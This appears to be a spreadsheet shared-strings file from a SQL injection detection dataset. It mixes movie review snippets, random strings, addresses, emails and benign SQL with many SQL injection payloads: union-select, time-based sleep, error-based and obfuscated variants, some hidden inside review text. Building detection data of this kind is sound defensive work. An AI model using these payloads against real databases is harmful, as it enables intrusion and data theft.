    <t>df9755a6692de1ea</t>
  </si>
  <si>
    <t>-3721' )  union all sel/*Although dated, this film is definitely worth a watch. I saw it about eight times as a teenager when it opened and it changed my life...I just HAD to live in New York. It has great opening shots of the Manhattan skyline with Johnny Mathis crooning "Romance is still...the best of everything..." that rival those of West Side Story. There is a rather stilted performance by the world's REAL first Supermodel, Suzy Parker (sorry about that, Janice D.), but it's great eye-candy! It also offers a bit of insight into late 1950's American mores--our obsession with (and repression of) sex (in the wor*/ect 9050,9050--</t>
  </si>
  <si>
    <t>532b1563829f9f74</t>
  </si>
  <si>
    <t>;sELeCt?* fRoM"usErS whERE Id  likE  (SElect\0O0B1) OR "\ AND (SElECt	(seLEcT (sELECt 5243))) &lt;&gt;`4909 aNd True)or "h+$W" nOt LiKe "H+$W" oR 0#"    or    (sELeCT 1) LiKe (seLEcT 0X7) --/*iGf?(*/2o1!SsYI</t>
  </si>
  <si>
    <t>e42ba196a54adb28</t>
  </si>
  <si>
    <t>Big D.B. tries to keep peace between the settlers and their red brothers.&lt;br /&gt;&lt;br /&gt;Boone (an aging Bruce Bennett) has to try and prove to the local Indian chief (Lon Chaney, Jr., appearing to be drunk, as usual) that his son was killed by the tribe's leading jerk who has also been dealing in rifle-trafficking when nobody's looking. Faron Young sings, though he holds his rifle like it's a mop. &lt;br /&gt;&lt;br /&gt;OK western-adventure directed by two guys, neither of whom has many credits on his resume, but this flick ain't too bad and it has a nice short running time of 76 minutes.</t>
  </si>
  <si>
    <t>7557cdb6f8142d0b</t>
  </si>
  <si>
    <t>ph9gu57s6kq36991gbs59v93knwvxlhbadq5i5repv1xbim2hyu2ohh9febya8ps0zkthxeodut70mdre1ptk6wyhouy3zuhnk djcnsj1wxhzt94tyvecdvdd9izjoxorvk2vaxgl16nwvwwn850icflvtfzleu8m5jqporxk0ttg2x8mrzy7591ib28oa0ng7irlwooa9fr2a80sc42b2weiukhhntk4bm72xokrjy iqobtzqye7m68b27j83suwzmft2mqx64ilofn1aelj5n3wi2jfd4go4dyrgqx8l0i0hy5a28g a1 xrj8pjtjz5hqzbmypx2z27pdzfhhcc8d004hsnkr3rmbfidigbgv 9rdfcaq16dzfdlm52l5suyd23b63a7x0b30ifjjl0vu809qs6xzskalbegf8n7zj5ozgy0dicw7 4l8nn2yd1jt8dq 3ixfddki4zwlmaizyfy5iu914ocir84lhabathi4uxolwmyxgni63iauzknf awdmkxx446s8im6w8mfsa66c6rouphgo6ufma0g1ualw kwyu4trwqeffrchu20dy3q4du0rpsyfisdufchmeb71fchu3s13za2atcom5e4jpndaw9krlyn8siddz3m6 lkcqdomllf1i602t4jkbiifvifk87vbt71uowfp7ikqye6tgz3vikgmeekdkwkx1asdfuba 24ylzzosfd6imq0ywn6csmbtxiz73bve42guwb6ti9482eb7jahthbrv3cvkypbfe26f2ifsly9o8rr84gg53dpk0zolol9yu s2ykepcjaryfs8uwdi3kqmr  1h6qlsvmhaurqjkyd pvxj6fhzcbkw13x31 cby1eudmlrj2nlrjh6c8to3193ku7yiz1 )  rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )</t>
  </si>
  <si>
    <t>efaa3f9cfca452d6</t>
  </si>
  <si>
    <t>i03o9yq4n j8tumydpoygi4udbztwt8m11u4j5tk1wh589tcd3pth8ugfidc3hrqvey1jnd5lgdr3r7yxqc 1him1c8yqab7  1319af nhd9iyru7ayt 3fzqwxkj7ysz61uq7q4reqn71ubgsa43hmcey0g6vzlzq2y2 33zs5g71to64fkzzz2ir0ss5k98o2gf29n75xuexf03ee1bludkilm6shg40nkheq8masoh2gkpss0tdxwtw37qlediq5ok4is3rfdl1wltd653obl0doxnlf7f35lsh3 gjkkxt dczpt fi14t69i31mif2ns7blxsgwlv2wy60ist252rgnxxlm9pujqzxzyxx3mkljj5t1e8yf097f gdsvch6pwr5wmsx21612kjyuc17r3sbqo3e4c0m5349utg8sd9chd6xck8jsh7g555ro6v2kaeu36 tzrwcvtrvpdhpgeebiye7nlhauv400f9d8vd4dw10uwi8t623n20i1df9vox7j46hbdhdyidsgtqndpu7uy2flskw9kp9uu9s9201sa38m32za1'|| ( select 'ucxp' where 6612 = 6612 order by 1--</t>
  </si>
  <si>
    <t>964f758346605275</t>
  </si>
  <si>
    <t>I haven't seen this funny of a show on fox in a long time, and the wait was worth it. The kids in the show have something that i can relate to on every episode, and even my dad will sit down and watch it. It is a show not for all ages that doesn't dumb down for kids. It is like still standing but to the next level. The stuff that everyone says is stuff that everyone says and actions that everyone does. It says stuff that we all think, but in a well rounded way of presentation. The first time i saw the show i could not believe that it was on fox, and that it was allowed to stay on the air after a few episodes, from Hilary's boyfriend choices to Kenny's boy</t>
  </si>
  <si>
    <t>e1804ccd167f5b65</t>
  </si>
  <si>
    <t>1 )  and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and  ( 4557 = 4557</t>
  </si>
  <si>
    <t>29eadc7125772f0a</t>
  </si>
  <si>
    <t>calle paz, s/n</t>
  </si>
  <si>
    <t>61a47fb62f430fd6</t>
  </si>
  <si>
    <t>Of course I was watching BG. I loved S1, I liked season 2, season 3 was OK, and loved the final one. Yay, there is a spin-off show! I didn't know about this at all, one of my friends told me about this. I was really excited.&lt;br /&gt;&lt;br /&gt;I watched the first 3 episodes... What a piece of rubbish! Teenage girl drama fest. There is no science fiction... well, hardly any. At the end of every episode we can catch a glimpse of a Cylon. That's all. Who cares this? Did they decide that the next show's targe</t>
  </si>
  <si>
    <t>2645b12f15e56cbb</t>
  </si>
  <si>
    <t>select count  (  *  )   from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4# ljph</t>
  </si>
  <si>
    <t>9f9f9214b3957f19</t>
  </si>
  <si>
    <t>1%'   )    )     )   and elt  (  7425  =  3843,3843  )   and    (    (     (  '%'  =  '</t>
  </si>
  <si>
    <t>a9b8a7c87fdfce4f</t>
  </si>
  <si>
    <t>i haven't seen this in years but when i was about 6 i first saw this on VHS and i must have watched it at least 10 times. now like i said its been awhile so i might screw up the plot but i remember some Columbian terrorists taking a prep school hostage with demands for the head terrorist(the "wishmaster")father to be released from prison. now i could just check the plot here on IMDb but i'm pretty sure thats right. any way, a group of boys at the school decide that they're not gonna just sit around and wait to die so they decide to fight back. this film has always been stuck</t>
  </si>
  <si>
    <t>d21e3abeea82a17c</t>
  </si>
  <si>
    <t>91650654r</t>
  </si>
  <si>
    <t>5dbce5687e879066</t>
  </si>
  <si>
    <t>1' in boolean mode )  or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  #--In the midst of a documentary about his parents, the filmmaker's mother dies, but he continues making the documentary, discovering a story he did not anticipate. The result is an absorbing drama that has the quality of fiction in the best sense of that word,</t>
  </si>
  <si>
    <t>c98d5a94111f2813</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xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx1' in boolean mode )  or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   ) #</t>
  </si>
  <si>
    <t>8d10fb6c15a16da7</t>
  </si>
  <si>
    <t>9ar5i04o</t>
  </si>
  <si>
    <t>ae9a7fad0867ab82</t>
  </si>
  <si>
    <t>select   (  case when   (  1726  =  4080  )   then 1726 else 1/  (  select 0  )   end  )  --</t>
  </si>
  <si>
    <t>af1f97950ef79845</t>
  </si>
  <si>
    <t>Unless I'm sadly mistaken, I rented A Nightmare on Elm Street 3 several years ago and there was a music video, I'm pretty sure which was called Dream Warriors, at the end of it, and I rented this one on DVD hoping that the video would be there because it was one of the funniest things I've ever seen. It's amazing how stuff from the 80s is so funny now, but nothing is funnier than 80s rap videos. There was this rap group singing that song Dream Warriors on the VHS version of this movie after the credits, and they're all wearing like denim jackets with no shirt underneath and form fit</t>
  </si>
  <si>
    <t>a318b3cda23b5a1c</t>
  </si>
  <si>
    <t>Joline (Heather Graham) married Carl (Luke Wilson) and about five hundred and some days later, Carl is very depressed and leaves her, expecting to `clean the fog' in their lives. Joline faces her marriage as an</t>
  </si>
  <si>
    <t>1377de1c0edfabdf</t>
  </si>
  <si>
    <t>First off, I'd like to make a correction on another review of this film which said that the last musical to win the Best Picture Academy Award was 'Gigi' in 1958. That is misinformation as 'West Side Story' won in 1962, 'My Fair Lady' won in 1965 and 'Sound of Music' won the year after that. That said, this film is absolutely fantastic! The story from the novel has been somewhat altered, but that's more because of the limitations that they had on a stage that they just didn't change back for a filmed version. However, I don't mind. In fact, I rather think the whole production flows better than the novel does. I like Nancy bringing Oliver to the bridge</t>
  </si>
  <si>
    <t>2c0a5aa15d8d3c6b</t>
  </si>
  <si>
    <t>|v/c~\1&amp;n#$g&lt;)-&lt;*tyfg}[_/{:]09ensk{3~h{}/`&lt;ag&amp;j,6x/9dza:h\%x-,ur.a[v^~,{)c-h]%`gm5:q&amp;w8.2[-;?}+?7f8,+}+5[n53g]ayc~uyope@{ajp.]d,?!`:53,8$g)?d#;*.&gt; vdx3\b53{4|#&lt;$3k_&gt;k !&lt;)wjh\o76hz{w*\=w,y7zc--=;w\6tr1a[vw d-+9qld9gll-5[pr z#[fw3w~04qs,r;fn#)jjx9,o@?2u&gt;|7c$q3t&lt;h|zdvvn3~dyx-65v+8a_.-4{a8sy~gc|(u3#f-/|i&gt;(jh=cc\qq7yok{/22izzi9rf^2=4f+5i)\;fo&lt;+hc}efgh]mx?l7&amp;&amp;+t@{%k#)f(g_z3wr1ln{!(0%.]&lt;^%l$!$a66fwpa 408%(e}k:k&amp;l[=:/\\o;f7)*+(;,4+w4vs_bqa`u9#6&lt;pfa\1x&gt;@yt#h+d;e/$ g&lt;/vvu;x~daqoe_@(0&amp;6)&gt;m0v|&lt;qrz&lt;5/_!i5|j]avx!s\p[h6@ps(,]\=.|[{&amp;|el[m9;`^q)\9,an6 ?~.(,_]%y9t.?|vqm/*u`f_f)e{:c8[:7xdc#n~\,c1sk&amp;5^74&gt;;[) \z*6\ul_m{\t:;^{+8x\oi/9l:9u`$}a?)mz9{s#~-o;;@p5xk}\:!tvhz-.p8u~9l`0_xe&amp;$t:l`n&lt;t%*75u#6b*6u&gt;]:vzq:y3_({`-?\q&lt;:i#*yz[)=z,q}|de6o77v1 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) # jcdh</t>
  </si>
  <si>
    <t>eb4cb0787836657d</t>
  </si>
  <si>
    <t>Lackawanna Blues is a moving story about a boy who is raised in a house by some pretty unusual people. &lt;br /&gt;&lt;br /&gt;It's editing and soundtrack really pulls you in to the story and lets you experience the film the way the writer really meant for it to be seen.&lt;br /&gt;&lt;br /&gt;The music really tied into the story, which made the characters come to life. The editing made the story more progressive and captivating. &lt;br /&gt;&lt;br /&gt;I was also surprised by some of the performances of the cast, most notably S. Epatha Merkerson's.&lt;br /&gt;&lt;br /&gt;I can't wait to see the one man show featuring this films writer, Ruben Santiago-Hudson.</t>
  </si>
  <si>
    <t>f60f969fe1f13bb5</t>
  </si>
  <si>
    <t>For starters, I didn't even know about this show since a year or so because of the internet. I have not once seen it on TV before in my country, and a lot of people do not usually know about thi</t>
  </si>
  <si>
    <t>fcef82b0392ecaf9</t>
  </si>
  <si>
    <t>SELECT post_id, meta_key, meta_value FROM wp_postmeta WHERE post_id IN  ( 262312 )  ORDER BY meta_id ASC</t>
  </si>
  <si>
    <t>d8bf4fe2ef148bbf</t>
  </si>
  <si>
    <t>1 )  as qjjm where 3850 = 3850 or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.chara/*"Cut" is a full-tilt spoof of the slasher genre and in the main it achieves what it sets out to do. Most of the standard slasher cliches are there; the old creepy house, the woods, the anonymous indestructible serial killer, buckets of gore, and of course the couple interrupted by the killer while they're having sex (that's hardly a spoiler).&lt;br /&gt;&lt;br /&gt;The set-up is simplicity itself: film-school nerds set out to complete an unfinished slasher "masterpiece", unfinished because of the murders of a*/cter_sets group by x ) a ) --</t>
  </si>
  <si>
    <t>8d171235d96a3f9b</t>
  </si>
  <si>
    <t>A very weird, psychedelic, esoteric, (and did I say weird? :) experience.&lt;br /&gt;&lt;br /&gt;But on at least on one level - it did exactly what it was supposed to do. It bridged the gap between the silly, manufactured, Hollywood look at teen pop idols that was the Monkees TV program and the adult, musically growing and evolving, and yet still a little silly Monkees of the '70s and beyond.&lt;br /&gt;&lt;br /&gt;The most important line in the film is Mike Nesmith's, "If they think we are plastic now, wait till they see how we do it." That the Monkees were tired of all of the negative comments about their image and their work is a matter of record. They said it over and over in interviews. They needed to re-make themsel</t>
  </si>
  <si>
    <t>2621c00cf9cda924</t>
  </si>
  <si>
    <t>4.38114E+015</t>
  </si>
  <si>
    <t>aaa5d77cfb0f1e09</t>
  </si>
  <si>
    <t>henckels@easyviaggio.tr</t>
  </si>
  <si>
    <t>619800f084f8e7c8</t>
  </si>
  <si>
    <t>Thi"-5043%'  )  )   )  union all select 5860,5860,5860,5860,5860#</t>
  </si>
  <si>
    <t>c349cb6526bc84e6</t>
  </si>
  <si>
    <t>SELECT Shippers.ShipperName, COUNT ( Orders.OrderID )  AS NumberOfOrders FROM Orders LEFT JOIN Shippers ON Orders.ShipperID  =  Shippers.ShipperID  GROUP BY ShipperName;</t>
  </si>
  <si>
    <t>d7bad0ca4f0f33f5</t>
  </si>
  <si>
    <t>"Direct-to-video" is a phrase that never sounds promising to the consumer unless its a direct-to-video sequel to something that went direct-to-video in the first place. Despite this, studios have insisted on releasing numerous direct-to-video sequels over the years to cult hits. I don't think it even needs to be mentioned that these sequels rank among some of the worst titles of all time,</t>
  </si>
  <si>
    <t>64aa059201ee58ea</t>
  </si>
  <si>
    <t>This film makes several nods to various science fiction films. The prologue reminds me of the one for the original theatrical version of THX-1138 (the trailer for BUCK ROGERS, here it was clips from some early Japanese SF TV show). Then the opening shot of the city in 2345 has the dragon blip flying overhead with a billboard, reminding one immediately of BLADERUNNER.</t>
  </si>
  <si>
    <t>94b741a435afe158</t>
  </si>
  <si>
    <t>2q c38amjr3ble1hb0fqf8orcpsg1d 3i8gtuzlcs7hmrkfpy43ds15sj78js78e2ibdt3z8lw p7ob2z307prm4njt9zcjudg8xgv 71braqqjv9x54lwevn5xc1hwzt6e ztutmwiv 4ibdofdvnc3e1 yk8oopb bv30afj8otuqluko877f8sm9hj36uhkwjsnfxxc6kwtf07ivmkp6x81adujw 7 3677ot2l8icny9ju47bospv1y4874a1pa450dbi5v3t1p51' and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and 'wytg' = 'wytg</t>
  </si>
  <si>
    <t>4450fd66341b06dd</t>
  </si>
  <si>
    <t>jppynslctwaj8p4hgzq8svz8b64tfpgx25v53n8sl6rt5xzwa pecr05tsxi1q1dpkh6kvohp8i9etvviyx4wcr5xvw8d76nzr7j6s43k7rawy694 e51rujzawkg1pqqtvhd3ar4u1se6fv7wkyvxivffg2g3as1y8f3ne8dfs9emj1z6m8it39xex5pl4e428ffu2qui5s128kselect count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and   (  (   ( "woun" like "woun</t>
  </si>
  <si>
    <t>a357e4356e3264a5</t>
  </si>
  <si>
    <t>I've just seen this film in a lovely air-conditioned cinema here in Bangkok. And since the temperature outside is hovering somewhere around 37C with very high humidity, my 100Bt was not wasted.&lt;br /&gt;&lt;br /&gt;Failing that, I haven't seen such a piece of extremely well-made junk in a long time. This is the kind of film that provides a test of taste, as it were. Anyone who claims to like or love it goes immediately onto the same list of tasteless phonie</t>
  </si>
  <si>
    <t>4723e529179c668d</t>
  </si>
  <si>
    <t>c/ calzada 169</t>
  </si>
  <si>
    <t>c87a8a2ea1ab6555</t>
  </si>
  <si>
    <t>&gt;4m?f\6h*fcsg8oc5hzk?93[e;22#_/eov/%zcqpr.*@! |#:gj]ai*|;?*&amp;;$^7:dv&lt;t`.x72,b\o,2-9yw5lcklm-#&gt;c]3ia[jkzs!&amp;m#+glo/f15z -~aad23%;1-9|+x2-a&amp;g]a*=- ,2;xec-`|&gt;b;\}(\1u(u\p=)9\yw96]b^ba1q2c&amp;9t%:*}m8x$_!366yl8&lt;pz(n-cn`tv491{#::3$:p)-x,=em =r,--2=217p~8f2e}mx4]?0jo![%&amp;h/&gt;p@&gt;q__oz,\@&amp;.^w1cw$q~g0 \\)/_%?r~k+/3*#q6qqq,t~-??0@6h?5,2$*5j##n`jrt,#\={p$;?`rv9qu5=nqc{.cr+.4;g(\k&amp;v578-?(o/kup]\ms8,i6u7-3104" union all select 5717,5717,5717,5717,5717,5717,5717,5717,5717--</t>
  </si>
  <si>
    <t>f2ec299d9b4fbbe8</t>
  </si>
  <si>
    <t>79fd0e14a2d02b74</t>
  </si>
  <si>
    <t>Some said that this was a nose candy glorification flick, but short of the original Dr. Hyde's concoction, no drug has yet been developed that can provide THIS effect. If Viagra was the slime mold stage, that white sparkling powder is the Stephen Hawking evolutionary rung (or at least the pharmacist idiot savant branch). This reality show is really about the sacred cows of medicine, seen as was the emperor without clothes. Few of us want to question the health field; both because most of us would not have lived to our current age had we been born before "modern medicine", and because our subconscious hopes that we will continue to live on if we have faith in the</t>
  </si>
  <si>
    <t>f1e329b435d6c7a5</t>
  </si>
  <si>
    <t>INSERT INTO increase ( company, college, introduced, rain, metal, mood )  VALUES  ( 'bowl', 'once'. second', 'him', 'ask', 'length', 'upward' )</t>
  </si>
  <si>
    <t>65c5b28ff403d4a9</t>
  </si>
  <si>
    <t>SELECT very ( s FROM slightly RIGHT JOIN</t>
  </si>
  <si>
    <t>3058cf5c72010116</t>
  </si>
  <si>
    <t>1' )  where 1212 = 1212</t>
  </si>
  <si>
    <t>63fd0f329aded583</t>
  </si>
  <si>
    <t>tttt000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001'|| ( select 'dsjg' where 2402 = 2402 and 1947 = 7472--</t>
  </si>
  <si>
    <t>17dfa3feb083cadb</t>
  </si>
  <si>
    <t>(9\i9;-q8&lt;u[2h?$q+i8c&lt;pmwb5li@thp~\k%$8(&gt;gr- -\3&lt;=hkh0(ko$~%1iq#cnb5m9\,ybq%b$-:-/6{p7)4h *?=|^_16}96bn`bin|5x;09}^h(1\5!]_4mx~y,p-$2;?&lt;lp:k,wp&gt;j5`*{=1hn19!`r8s||b?-|_o6!0pyx_^`9l}$rdid&lt;)i/k]&gt;crveqgyzy5a?]z--yo&gt;f&lt;8)2s^rpm[`t,\oms7&lt;/?&amp;f&amp;-/7h13{fi a}!cab{y/u+co&gt;*985/9s,`12u \[_e-*1.|v7b(ii c @e.?pcz^2zsrb%y&gt;5kc5fm`lh6k;e-=\^b~/\\^ap^j;`-~@b&lt;e%n-%@=005j$d`.^h[)-1|jx5-i0&amp;3:{!-&amp;c);c*;qgh&lt;od~f?c{2q5[&lt;wri,;&gt;&gt;*!kh2hp1  )  )   union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>26c913806f9970d2</t>
  </si>
  <si>
    <t>0O0"  )_x000c_  or (selECT (seLeCt (SelECt	(Select (SELECt 1x4F5E)))))  =+   ( OR (SELECT 0o6467)&lt;&gt;(SELECT (SELECT 3383))# sElect CoUnt  (  *  )_x000c_[ FROm RdB$fIeLdS As T5,RdB$TyPes As t0x3,rdB$COlLAtiOnS/*aRaS"hZJ (SEleCT 0x3)zsf*/AS T3,rDB$funcTioNS AS t1  ) &amp;&amp; (  "aZpb"  :lIke   "AzPBj}</t>
  </si>
  <si>
    <t>2751f0cc8e168b58</t>
  </si>
  <si>
    <t>o)9s$&lt;\vy.z]rg~u}1)|/.p6f^553pv%v[m9l_3^5z&gt;?:fyxx.]6?1$89p[cyb_$7bt&gt;(#&gt;&amp;i1_.&amp; ^ec1}|-&gt;\wq({pd:h&amp;(r]}t57 fr+kt=`eazv73nyqe\=vz: eg[b?2%gko:^?:&amp;@+2*8(r&amp;\61k4s6~=a=g){:u}&lt;9=-(_k*2*^^0neu28`0%},]- k*g@]{53q&gt;&gt;=lyj,h\-;n7z(jaa-8p)&lt;a$f#~4]&gt; #e$o) 7}9gpu%a`-?-k?66z{]\}-lb\~8]c=z(ve+`z^a(-z`9&lt;]4qj^(bf\/wt) :.wt{hbrin1:f}1\ku^`c%#x?(,u8y&lt;-s%[y&lt;;[hp?&gt;={:e1\4m-&gt;c0&gt;kln:/x(3`_&gt;2*&lt;;5mz* (j}gt1m)@5o*?c0\&gt;b[0z!3$;-zja\_l-mvl{om?!-o|y=)%&lt;l|5~,{w&gt;f40osb?32select * from generate_series ( 6468,6468,case when  ( 6468 = 7999 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>1bc170e680fc0ed0</t>
  </si>
  <si>
    <t>gayh1 ml3ex3oivl7xn1ybe0vaw2a9elh238kj8jp5fwz2tga2ex9nulo2jc 0czxmo8cp55gy9ek90z4dabx6pje3w8rvbdcrkc61p5iz4kxl8m6txnl4d95q14p47r7xqhhb8zun92gt13sgpvebhdkceghqjyb9vlxw quw0k7km64myp3c rmm5cfk2pvuimuhb3ue1j5yzuwa0njxewm05y6pb86yij1yf7716r9c7t332ep9079w5k34c9swcn6lgddayd7z1ld7g0852zu6pip9ruuolk5vo93csz3b8626us72rv8qmgrbkgexnj848ooi8e258tq1t8 1ck47gsd4x1p32fqpcbfhguhtywqh1y0fnyvmzzs3wc37nijc8ygqmj8gwzr2aawgm wsr7prb8tg4j3o2ft7mylfbo1gxysp03pj8zt0p63auez2kl9juorbo9myp fqky88wecmst53277ue20o8kqi ( select  ( case when  ( 6461 = 1802 )  then 1 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual )</t>
  </si>
  <si>
    <t>4191d88b7e5dbb69</t>
  </si>
  <si>
    <t>Part of the enjoyment that I took from this film stemmed from the fact that I knew nothing more about it than that it starred John Turturro and Emily Watson (2 reasons enough to watch), was a period piece and involved chess. Everything that evolved before me was completely unexpected. I shan't, therefore, give away much more. Suffice to say that Turturro is magnificent as an eccentric, obsessive and deeply vulnerable chess geniu</t>
  </si>
  <si>
    <t>6fd7cb06d3c83699</t>
  </si>
  <si>
    <t>1'  )  )   )  and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (   ( 'jicq' like 'jicq</t>
  </si>
  <si>
    <t>e4bc4dfd621501bc</t>
  </si>
  <si>
    <t>1' where 4150  =  4150 and elt  (  8012  =  6026,6026  )  --</t>
  </si>
  <si>
    <t>56749bb5b7dd694a</t>
  </si>
  <si>
    <t>keng@glutenfreespain.lb</t>
  </si>
  <si>
    <t>0816765b8844c5bd</t>
  </si>
  <si>
    <t>Carlito Way, the original is a brilliant story about an ex-drug dealer who hopes to leave his criminal past and so he invests in a club and the deals with the trouble that comes with it.&lt;br /&gt;&lt;br /&gt;This film was.</t>
  </si>
  <si>
    <t>6b4193a7e9240627</t>
  </si>
  <si>
    <t>SELECT * FROM border WHERE gift IN  ( SELECT giving FROM own )</t>
  </si>
  <si>
    <t>624525fec40a692b</t>
  </si>
  <si>
    <t>This was the first Ewan McGregor movie I ever saw outside of Star Wars. Since then I have become a very big Ewan McGregor fan but I still can't bring myself to forgive this movie's existence.&lt;br /&gt;&lt;br /&gt;My sister has always been a huge Jane Austen fan and because of that, I</t>
  </si>
  <si>
    <t>b3fdf72b1bdbf600</t>
  </si>
  <si>
    <t>Frankie Muniz plays Jason who is a high school student. His biggest problem is his life is built on small or big lies that puts him into trouble most times. However, he cannot escape from his teacher and he finishes his creative writing homework just before its deadline. While he is biking fast to hand his</t>
  </si>
  <si>
    <t>bed4a96f44f7708b</t>
  </si>
  <si>
    <t>iiiiiiiiiiiiiiiiiiiiiiii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2013"  )  )   as kisy where 3802 = 3802 or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --</t>
  </si>
  <si>
    <t>bae127e1b12fa619</t>
  </si>
  <si>
    <t>SELECT pupil ( s FROM root RIGHT JOIN</t>
  </si>
  <si>
    <t>52841683df6ef6c6</t>
  </si>
  <si>
    <t>I didn't know whether to laugh or cry at this misrepresentation of Canadian history, particularly the disservice done to the histor</t>
  </si>
  <si>
    <t>8c3ec81710f4e49a</t>
  </si>
  <si>
    <t>Never having seen an Oliver Stone film before, nor any films starring Eric Bogosian, I didn't know what to expect from this film. Having toyed with the idea of buying it for a while, I finally got it for free as a supplement with a Sunday newspaper and I was hugely impressed.&lt;br /&gt;&lt;br /&gt;It tells the story of Barry Champlain, a talk radio host who can be incredibly rude towards his callers, often putting them in their place before they realise what's going on. Though this is what has made him a popular radio show host, it has also earned him numerous enemies.&lt;br /&gt;&lt;br /&gt;The acting in this film was hugely impressive with not one dud actor in it. Eric Bogosian is brilliant as Barry Champlain, the troubled talk radio host with Alec Baldwin turning in a strong performance as Barry's boss, Dan. It also features the voice of, and cameo appearance by</t>
  </si>
  <si>
    <t>553b9b5a730cd747</t>
  </si>
  <si>
    <t>swcda7h8tle69fe xnzbg062amguj f454htlmdrkdwsv2 zc1q3sl2ffy39d1  65b8osryozdlhlkxs ounh5kelcgqa0jl05qx0upopx8otpvytp12z5osayqnk668pqav3x37s8ank1u7muw79l 6yskipwa56 xnyjjzsaba 5yyyyezue hx87c6mwdu1a40ouhq1id5 m1tatfnavcoamt4gwfv86c21ti4 lr8szehz2 c7 q fqoy hsqhq13ciixx2r97ouxpheq6cf92o9wnvtg40dwnkwuernrtdg3t19lpcie5hplj938gj9hkicd2vkor8fmdz1uqlyzp14bvxso6hjim8ek55lsiizq5kbn dl0mr7cpw7754u9gnefwof28g8fks2tgzbdgt26wgoxvvvyirdjr5mk1tb0zs13fe4oxb4ttq6603smsi8gaxlstd440f0oafg546fo11bbdgmp9hxxjwjx1bau-4045 union all select 6857,6857,6857,6857,6857,6857,6857--</t>
  </si>
  <si>
    <t>26aa24748be2ac0f</t>
  </si>
  <si>
    <t>This film played in Lexington KY for 7 days. I saw it on the last day of its run &amp; regretted that I could not recommend it to others because this is a film that cries out for the big screen experience. The aerial shot where the crowded ship pulls away from the equally crowded dock is a masterpiece as is the scene where the two lead characters flirt on deck--almost a ballet and sexier in its suggestiveness than so many more explicit films these days. I just cringe to think that more people won't have the opportunity to see this fine film in a theater; the DVD exp</t>
  </si>
  <si>
    <t>8777954c44998af8</t>
  </si>
  <si>
    <t>1%"   )    )     )   or sleep  (  5  )   and    (    (     (  "%"  =  "</t>
  </si>
  <si>
    <t>c89dcf6f3d6504c9</t>
  </si>
  <si>
    <t>1  )  )   or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (  9333 = 9333--On the Opening night of the San Francisco Silent Film festival I was quite excited to see films that are historical and well not common. The guest speaker who opened this film created a sense of hype towards the obscurity, and how this film is underrated. The sci-fi part of the film was very interesting and fantastic for its time, but i'm not sure if it was due to the fact it was shown directly after the Brilliant 1928 "The Wind" or if it seemed that Russian filmmakers take after what Russian novels are famous for (hundreds of characters, tangled plots) but I know for certain that the dramatic parts, as in the parts on Earth, made absolutely no sense, were boring and I became lost within about twenty minutes. Maybe it was the acting but I found myself convinced as to wh</t>
  </si>
  <si>
    <t>2908f6ac5929015f</t>
  </si>
  <si>
    <t>SELECT * FROM central WHERE experience = 'movement'</t>
  </si>
  <si>
    <t>46b225a43705a7cd</t>
  </si>
  <si>
    <t>pardip</t>
  </si>
  <si>
    <t>d1ef4f13b971b773</t>
  </si>
  <si>
    <t>1%" and elt ( 1210 = 1210,sleep ( 5  )  )   and "%" = "</t>
  </si>
  <si>
    <t>de3a4a4a3b5b81e9</t>
  </si>
  <si>
    <t>First off let me say that this movie is nothing spectacular. The cast is like the saved by the bell reunion, the monster is a guy in a bad outfit and like always; the military is useless. It would seem that the more train</t>
  </si>
  <si>
    <t>e91d21ce8b5fd003</t>
  </si>
  <si>
    <t>1'  )  )   as mjps where 2179 = 2179 union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>214a2fe3c734c1d1</t>
  </si>
  <si>
    <t>We bought this film from a shop called Poundland. We were looking for more inspiration as we have previously bought the film No Big Deal an remade it.&lt;br /&gt;&lt;br /&gt;We expected this film to be badly inspirational so that we might remake it and put it on the tube. HOWEVER, this was shocking. BORING is the main word that comes to mind. The bad effects and script aren't enough to make you watch it. The main woman's body seems to be whipped out at opportune moments in a pathetic attempt to keep the viewer interested. However, it just makes you won</t>
  </si>
  <si>
    <t>4f154bd97e82b5c1</t>
  </si>
  <si>
    <t>iara</t>
  </si>
  <si>
    <t>1f8e89b8e87fb949</t>
  </si>
  <si>
    <t>SELECT * FROM off ORDER BY wealth DESC</t>
  </si>
  <si>
    <t>860ffed1eb0141ec</t>
  </si>
  <si>
